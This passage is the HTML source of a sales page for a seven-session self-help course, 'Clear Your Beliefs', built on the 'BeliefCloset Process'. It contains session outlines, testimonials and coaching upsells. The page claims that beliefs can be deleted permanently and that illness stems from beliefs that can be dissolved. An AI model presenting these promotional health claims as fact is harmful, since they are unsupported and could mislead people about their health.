done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of 